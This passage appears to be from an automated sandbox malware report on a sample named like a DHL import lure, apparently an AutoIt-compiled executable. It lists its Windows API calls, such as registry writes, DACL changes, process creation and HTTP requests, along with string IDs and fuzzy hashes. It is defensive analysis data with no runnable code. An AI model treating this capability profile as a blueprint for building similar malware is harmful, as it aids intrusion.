                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                          • String ID:
                                                                                          • API String ID: 1996641542-0
                                                                                          • Opcode ID: 1cc4ae1fa7bc685d01fe48eb443e84533bde5c717895d75ab06b6ba6cac2e3e0
                                                                                          • Instruction ID: 588a844755e157a4a807ef1de61b3f1084057148cada31f78b06a3410d24cd0c
                                                                                          • Opcode Fuzzy Hash: 1cc4ae1fa7bc685d01fe48eb443e84533bde5c717895d75ab06b6ba6cac2e3e0
• Instruction Fuzzy Hash: 69616D72900218AFDF019FA4DC49EAE7FB9FF09320F125125F915AB2A1D7B49940CF90
APIs
• GetCursorPos.USER32(?), ref: 00861128
• GetDesktopWindow.USER32 ref: 0086113D
• GetWindowRect.USER32(00000000), ref: 00861144
• GetWindowLongW.USER32(?,000000F0), ref: 00861199
• DestroyWindow.USER32(?), ref: 008611B9
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 008611ED
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0086120B
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0086121D
• SendMessageW.USER32(00000000,00000421,?,?), ref: 00861232
• SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00861245
• IsWindowVisible.USER32(00000000), ref: 008612A1
• SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 008612BC
• SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 008612D0
• GetWindowRect.USER32(00000000,?), ref: 008612E8
• MonitorFromPoint.USER32(?,?,00000002), ref: 0086130E
• GetMonitorInfoW.USER32(00000000,?), ref: 00861328
• CopyRect.USER32(?,?), ref: 0086133F
• SendMessageW.USER32(00000000,00000412,00000000), ref: 008613AA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
• Opcode ID: ec530ec54d4356abe326d81ffa0437541ff2cb522ca672665d553ae975316a28
• Instruction ID: 438e3b7692495e6ad3d20a5238795bcfd3d8c43812a2a0ba24553beaafb08e4f
• Opcode Fuzzy Hash: ec530ec54d4356abe326d81ffa0437541ff2cb522ca672665d553ae975316a28
• Instruction Fuzzy Hash: DFB18A71604341AFDB00DF64C988B6ABBE4FF88344F05891DF99ADB262C771E844CB92
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007E8968
• GetSystemMetrics.USER32(00000007), ref: 007E8970
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007E899B
• GetSystemMetrics.USER32(00000008), ref: 007E89A3
• GetSystemMetrics.USER32(00000004), ref: 007E89C8
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 007E89E5
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 007E89F5
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 007E8A28
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 007E8A3C
• GetClientRect.USER32(00000000,000000FF), ref: 007E8A5A
• GetStockObject.GDI32(00000011), ref: 007E8A76
• SendMessageW.USER32(00000000,00000030,00000000), ref: 007E8A81
  • Part of subcall function 007E912D: GetCursorPos.USER32(?), ref: 007E9141
  • Part of subcall function 007E912D: ScreenToClient.USER32(00000000,?), ref: 007E915E
  • Part of subcall function 007E912D: GetAsyncKeyState.USER32(00000001), ref: 007E9183
  • Part of subcall function 007E912D: GetAsyncKeyState.USER32(00000002), ref: 007E919D
• SetTimer.USER32(00000000,00000000,00000028,007E90FC), ref: 007E8AA8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
• Opcode ID: 9e75cd6a90726bad68e7472a5b13d891b52e40393fdc560c49ffaf3388767878
• Instruction ID: 6df72e99b78c4fcf9bc208b9dcd2fcc11dbf7fefa233aa3a00405dbf3040b2d3
• Opcode Fuzzy Hash: 9e75cd6a90726bad68e7472a5b13d891b52e40393fdc560c49ffaf3388767878
• Instruction Fuzzy Hash: EDB18A75A0024ADFDF14DFA8DC49BAE7BB4FB48314F118229FA15E7290DB78A850CB51
APIs
  • Part of subcall function 008310F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00831114
  • Part of subcall function 008310F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 00831120
  • Part of subcall function 008310F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 0083112F
  • Part of subcall function 008310F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 00831136
  • Part of subcall function 008310F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0083114D
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00830DF5
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00830E29
• GetLengthSid.ADVAPI32(?), ref: 00830E40
• GetAce.ADVAPI32(?,00000000,?), ref: 00830E7A
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00830E96
• GetLengthSid.ADVAPI32(?), ref: 00830EAD
• GetProcessHeap.KERNEL32(00000008,00000008), ref: 00830EB5
• HeapAlloc.KERNEL32(00000000), ref: 00830EBC
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00830EDD
• CopySid.ADVAPI32(00000000), ref: 00830EE4
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00830F13
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00830F35
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00830F47
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00830F6E
• HeapFree.KERNEL32(00000000), ref: 00830F75
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00830F7E
• HeapFree.KERNEL32(00000000), ref: 00830F85
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00830F8E
• HeapFree.KERNEL32(00000000), ref: 00830F95
• GetProcessHeap.KERNEL32(00000000,?), ref: 00830FA1
• HeapFree.KERNEL32(00000000), ref: 00830FA8
  • Part of subcall function 00831193: GetProcessHeap.KERNEL32(00000008,00830BB1,?,00000000,?,00830BB1,?), ref: 008311A1
  • Part of subcall function 00831193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00830BB1,?), ref: 008311A8
  • Part of subcall function 00831193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00830BB1,?), ref: 008311B7
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
• API String ID: 4175595110-0
• Opcode ID: 45bfac92e8d2915ed59ab8ca4e911868e3ae0c3875ebd54a7c72464756ff2daa
• Instruction ID: 0e07e549932769c2509471493747a8e80269551eee3b76a76875450fabcead26
• Opcode Fuzzy Hash: 45bfac92e8d2915ed59ab8ca4e911868e3ae0c3875ebd54a7c72464756ff2daa
• Instruction Fuzzy Hash: 5C715B7290420AEBDF209FA4DC48FAEBBB8FF45700F054115FA99E6191DB719905CFA0
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0085C4BD
• RegCreateKeyExW.ADVAPI32(?,?,00000000,0086CC08,00000000,?,00000000,?,?), ref: 0085C544
• RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0085C5A4
• _wcslen.LIBCMT ref: 0085C5F4
• _wcslen.LIBCMT ref: 0085C66F
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0085C6B2
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0085C7C1
• RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0085C84D
• RegCloseKey.ADVAPI32(?), ref: 0085C881
• RegCloseKey.ADVAPI32(00000000), ref: 0085C88E
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0085C960
Strings
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: Value$Close$_wcslen$ConnectCreateRegistry
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 9721498-966354055
• Opcode ID: f4f8173c6e87d41c4252ceef107940ad9575360ee3d13635b0f045914ef57084
• Instruction ID: 9b1bb5b6851c130945dbcde97a158905d0ccbc86c0395fef9d06bfdc838419fa
• Opcode Fuzzy Hash: f4f8173c6e87d41c4252ceef107940ad9575360ee3d13635b0f045914ef57084
• Instruction Fuzzy Hash: D9124535604201DFCB14DF14C885A2AB7E5FF88715F08889DF88A9B3A2DB35ED45CB92
APIs
• CharUpperBuffW.USER32(?,?), ref: 008609C6
• _wcslen.LIBCMT ref: 00860A01
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00860A54
• _wcslen.LIBCMT ref: 00860A8A
• _wcslen.LIBCMT ref: 00860B06
• _wcslen.LIBCMT ref: 00860B81
  • Part of subcall function 007EF9F2: _wcslen.LIBCMT ref: 007EF9FD
  • Part of subcall function 00832BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00832BFA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: _wcslen$MessageSend$BuffCharUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 1103490817-4258414348
• Opcode ID: eb81fd6babac40b287e96e1b06bcf391e9517c635e648575f9862feb062ed311
• Instruction ID: 2a50f21a4a0dbd202ffde777a878fb39d70d79c01d732e731aaba6a9d565f497
• Opcode Fuzzy Hash: eb81fd6babac40b287e96e1b06bcf391e9517c635e648575f9862feb062ed311
• Instruction Fuzzy Hash: 22E17A31208301DFCB14EF68C45092AB7E2FF98358B168A5DF8969B362D735ED45CB86
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: _wcslen$BuffCharUpper
• String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
• API String ID: 1256254125-909552448
• Opcode ID: 6a5acea7056316aa4cbb525f7115632bd4b0ec3594b496089b0a8cfb2725905b
• Instruction ID: a4d4675c57d038ece6de169e8692a0d1af8a03d6da9883c3d0b7b4123adc3a54
• Opcode Fuzzy Hash: 6a5acea7056316aa4cbb525f7115632bd4b0ec3594b496089b0a8cfb2725905b
• Instruction Fuzzy Hash: 5671047260022A8FCF20DE68CD415BF37A1FBA0766B150128FC66E7284E634DD4CCBA1
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 0086835A
                                                                                          • _wcslen.LIBCMT ref: 0086836E
                                                                                          • _wcslen.LIBCMT ref: 00868391
                                                                                          • _wcslen.LIBCMT ref: 008683B4
                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 008683F2
• LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0086361A,?), ref: 0086844E
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00868487
• LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 008684CA
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00868501
• FreeLibrary.KERNEL32(?), ref: 0086850D
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0086851D
• DestroyIcon.USER32(?), ref: 0086852C
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00868549
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00868555
Strings
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
• String ID: .dll$.exe$.icl
• API String ID: 799131459-1154884017
Strings
Similarity
• API ID:
• String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
• API String ID: 0-1645009161
APIs
• LoadIconW.USER32(00000063), ref: 00835A2E
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00835A40
• SetWindowTextW.USER32(?,?), ref: 00835A57
• GetDlgItem.USER32(?,000003EA), ref: 00835A6C
• SetWindowTextW.USER32(00000000,?), ref: 00835A72
• GetDlgItem.USER32(?,000003E9), ref: 00835A82
• SetWindowTextW.USER32(00000000,?), ref: 00835A88
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00835AA9
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00835AC3
• GetWindowRect.USER32(?,?), ref: 00835ACC
• _wcslen.LIBCMT ref: 00835B33
• SetWindowTextW.USER32(?,?), ref: 00835B6F
• GetDesktopWindow.USER32 ref: 00835B75
• GetWindowRect.USER32(00000000), ref: 00835B7C
• MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00835BD3
• GetClientRect.USER32(?,?), ref: 00835BE0
• PostMessageW.USER32(?,00000005,00000000,?), ref: 00835C05
• SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00835C2F
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
• String ID:
• API String ID: 895679908-0
APIs
• __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 007F00C6
  • Part of subcall function 007F00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(008A070C,00000FA0,A99004F5,?,?,?,?,008123B3,000000FF), ref: 007F011C
  • Part of subcall function 007F00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,008123B3,000000FF), ref: 007F0127
  • Part of subcall function 007F00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,008123B3,000000FF), ref: 007F0138
  • Part of subcall function 007F00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 007F014E
  • Part of subcall function 007F00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 007F015C
  • Part of subcall function 007F00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 007F016A
  • Part of subcall function 007F00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 007F0195
  • Part of subcall function 007F00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 007F01A0
• ___scrt_fastfail.LIBCMT ref: 007F00E7
  • Part of subcall function 007F00A3: __onexit.LIBCMT ref: 007F00A9
Strings
• kernel32.dll, xrefs: 007F0133
• api-ms-win-core-synch-l1-2-0.dll, xrefs: 007F0122
• InitializeConditionVariable, xrefs: 007F0148
• SleepConditionVariableCS, xrefs: 007F0154
• WakeAllConditionVariable, xrefs: 007F0162
Similarity
• API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
• String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
• API String ID: 66158676-1714406822
APIs
Strings
Similarity
• API ID: _wcslen
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 176396367-1603158881
APIs
• CharLowerBuffW.USER32(00000000,00000000,0086CC08), ref: 00844527
• _wcslen.LIBCMT ref: 0084453B
• _wcslen.LIBCMT ref: 00844599
• _wcslen.LIBCMT ref: 008445F4
• _wcslen.LIBCMT ref: 0084463F
• _wcslen.LIBCMT ref: 008446A7
  • Part of subcall function 007EF9F2: _wcslen.LIBCMT ref: 007EF9FD
• GetDriveTypeW.KERNEL32(?,00896BF0,00000061), ref: 00844743
Strings
Similarity
• API ID: _wcslen$BuffCharDriveLowerType
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2055661098-1000479233
APIs
• _wcslen.LIBCMT ref: 0085B198
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0085B1B0
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0085B1D4
• _wcslen.LIBCMT ref: 0085B200
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0085B214
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0085B236
• _wcslen.LIBCMT ref: 0085B332
  • Part of subcall function 008405A7: GetStdHandle.KERNEL32(000000F6), ref: 008405C6
• _wcslen.LIBCMT ref: 0085B34B
• _wcslen.LIBCMT ref: 0085B366
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0085B3B6
• GetLastError.KERNEL32(00000000), ref: 0085B407
• CloseHandle.KERNEL32(?), ref: 0085B439
• CloseHandle.KERNEL32(00000000), ref: 0085B44A
• CloseHandle.KERNEL32(00000000), ref: 0085B45C
• CloseHandle.KERNEL32(00000000), ref: 0085B46E
• CloseHandle.KERNEL32(?), ref: 0085B4E3
Similarity
• API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
• String ID:
• API String ID: 2178637699-0
APIs
• GetMenuItemCount.USER32(008A1990), ref: 00812F8D
• GetMenuItemCount.USER32(008A1990), ref: 0081303D
• GetCursorPos.USER32(?), ref: 00813081
• SetForegroundWindow.USER32(00000000), ref: 0081308A
• TrackPopupMenuEx.USER32(008A1990,00000000,?,00000000,00000000,00000000), ref: 0081309D
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 008130A9
Strings
                                                                                          Similarity
                                                                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                          • String ID: 0
                                                                                          • API String ID: 36266755-4108050209
                                                                                          • Opcode ID: 52a4c98ad5c7377449a0874fa41a9130c041351c242c7500d799ecafb0278131
                                                                                          • Instruction ID: ed4a0b916b919ea08b27dd5c151211d9fd3c817012c63dc7d721bf4b5f8550f6
                                                                                          • Opcode Fuzzy Hash: 52a4c98ad5c7377449a0874fa41a9130c041351c242c7500d799ecafb0278131
                                                                                          • Instruction Fuzzy Hash: AF710970640205BEEB319F25CC49FEABF78FF05324F204216F515A62E1CBB5A960C791
                                                                                          APIs
                                                                                          • DestroyWindow.USER32(?,?), ref: 00866DEB
                                                                                            • Part of subcall function 007D6B57: _wcslen.LIBCMT ref: 007D6B6A
                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00866E5F
                                                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00866E81
                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00866E94
                                                                                          • DestroyWindow.USER32(?), ref: 00866EB5
                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,007D0000,00000000), ref: 00866EE4
                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00866EFD
                                                                                          • GetDesktopWindow.USER32 ref: 00866F16
                                                                                          • GetWindowRect.USER32(00000000), ref: 00866F1D
                                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00866F35
                                                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00866F4D
                                                                                            • Part of subcall function 007E9944: GetWindowLongW.USER32(?,000000EB), ref: 007E9952
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                          • String ID: 0$tooltips_class32
                                                                                          • API String ID: 2429346358-3619404913
                                                                                          • Opcode ID: f6e27176ed34654eb3c0e8a6abcb2e9c8686e778ece401ffa1bfd66a3be37a2d
                                                                                          • Instruction ID: b5c528f150ecfb227b7a8b46f79af5711c3675e08edde79e3c26513029dc0d6e
                                                                                          • Opcode Fuzzy Hash: f6e27176ed34654eb3c0e8a6abcb2e9c8686e778ece401ffa1bfd66a3be37a2d
                                                                                          • Instruction Fuzzy Hash: 4C718770104284AFEB21CF18DC48ABABBE9FB99304F59041EF999C7260DB75A925CB11
                                                                                          APIs
                                                                                            • Part of subcall function 007E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 007E9BB2
                                                                                          • DragQueryPoint.SHELL32(?,?), ref: 00869147
                                                                                            • Part of subcall function 00867674: ClientToScreen.USER32(?,?), ref: 0086769A
                                                                                            • Part of subcall function 00867674: GetWindowRect.USER32(?,?), ref: 00867710
                                                                                            • Part of subcall function 00867674: PtInRect.USER32(?,?,00868B89), ref: 00867720
                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 008691B0
                                                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 008691BB
                                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 008691DE
                                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00869225
                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0086923E
                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00869255
                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00869277
                                                                                          • DragFinish.SHELL32(?), ref: 0086927E
                                                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00869371
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                          • API String ID: 221274066-3440237614
                                                                                          • Opcode ID: 646a59b66376ac8261d2447a152d290965c8fd05c0ff148e8cb9486f936a8af9
                                                                                          • Instruction ID: 47a3d88768edbb277b049bf12262ee936309eaf0adba2d4f54ea4eebdff827bd
                                                                                          • Opcode Fuzzy Hash: 646a59b66376ac8261d2447a152d290965c8fd05c0ff148e8cb9486f936a8af9
                                                                                          • Instruction Fuzzy Hash: 45614971108301AFD701DF64DC89DABBBF8FB89750F00091EF6A5922A1DB749A49CB52
                                                                                          APIs
                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0084C4B0
                                                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0084C4C3
                                                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0084C4D7
                                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0084C4F0
                                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0084C533
                                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0084C549
                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0084C554
                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0084C584
                                                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0084C5DC
                                                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0084C5F0
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0084C5FB
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                          • String ID:
                                                                                          • API String ID: 3800310941-3916222277
                                                                                          • Opcode ID: 7c7974b4fd9aac7c6b8930ea445c1f2271698e2cc9bf523e7a422c7deab44a21
                                                                                          • Instruction ID: 87c155f5047aa058fed3e16aea6b86c3315bc707ec2626cb70ff30f288a46dd4
                                                                                          • Opcode Fuzzy Hash: 7c7974b4fd9aac7c6b8930ea445c1f2271698e2cc9bf523e7a422c7deab44a21
                                                                                          • Instruction Fuzzy Hash: 01516CB0501208BFDB619FA5C988ABB7BFCFF08754F01851AF985D6210EB74E944DB60
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00868592
                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 008685A2
